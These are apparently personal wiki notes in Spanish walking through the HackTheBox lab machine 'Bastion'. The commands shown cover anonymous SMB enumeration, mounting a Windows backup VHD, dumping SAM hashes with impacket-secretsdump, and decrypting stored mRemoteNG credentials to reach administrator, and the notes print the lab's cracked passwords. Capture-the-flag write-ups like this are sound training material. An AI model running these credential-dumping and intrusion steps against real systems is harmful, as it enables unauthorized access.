Notas de Luis

Hacemos el escaneo de nmap:

Si enumerados recursos compartidos con smbclient con una null session, vemos los sigueintes recursos compartidos:

smbclient -L 10.10.10.134 -N

Con smbmap podemos ver qué permisos tenemos sobre estos recursos compartidos, donde vemos que podemos leer y escribir sobre el recurso backups:

smbmap -H 10.10.10.134 -u 'null'

Nos conectamos a este recurso compartido donde vemos un directorio de backups de windows:

smbclient -N //10.10.10.134/Backups

Nos montamos todo este recurso de backups en nuestra máquina atacante de la siguiente forma:

mount -t cifs -o username=null,password=null //10.10.10.134/Backups /mnt/montura

Y ahora podremos navegar por los directorios sin descargarnos nada:

Y esta es la estructura de los directorios:

Y observamos dos archivos con extensión .vhd (archivo de disco virtual):

Y con la utilidad guestmount vamos a montar cada uno de los discos en una nueva carpeta, que crearemos la carpeta discos. Pero con uno de los discos nos da error, aunque con el otro funciona bien:

guestmount --add /mnt/montura/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro discos/

Y dentro del directorio /windows/system32/config, hay un archivo llamado SAM, donde se pueden contener hashes de usuarios, por lo que nos ubicamos en esta ruta y con impacket-secretsdump tratamos de obtenerlos:

Ejecutamos el siguiente comando y obtenemos los hashes:

impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

Y vemos que la web de crackstation nos encontró el hash del usuario L4mpje:

L4mpje:bureaulampje

Una vez obtenido esto, vamos a entrar por ssh:

ssh L4mpje@10.10.10.134

Y una vez dentro de la máquina, si nos ubicamos dentro de archivos de programa x86, vemos un directorio llamado nRemoteNG, que es extraño:

En este enlace tenemos instrucciones de cómo explotar esto mismo:

https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/

Dentro de esta web, se nos dice que hay una ruta donde se guardan credenciales en un archivo confCons.xml:

Y confirmamos que ese archivo efectivamente existe en la ruta C:\Users\L4mpje\AppData\Roaming\mRemoteNG:

Pero la contraseña viene encriptada en este archivo, pero sí vemos al principio la línea de protected con la siguiente contraseña

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Por lo que vamos a pasarnos este archivo en local a nuestra máquina atacante y vamos a tratar de romperlo:

scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .

Y lo tenemos en local:

Una vez hecho esto, contamos con el siguiente exploit para romper este archivo y ver credenciales en claro:

https://github.com/haseebT/mRemoteNG-Decrypt

Ejecutamos este exploit siguiendo las instrucciones, pasándole la contraseña protegida y la obtenemos en texto claro:

python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Las credenciales del administrador son las siguientes:

administrator:thXLHM96BeKL0ER2

Entramos por ssh:

ssh Administrator@10.10.10.134

Y ya estamos dentro:

computing/hacking/ctf/hackthebox/maquina_bastion.txt · Última modificación: por 127.0.0.1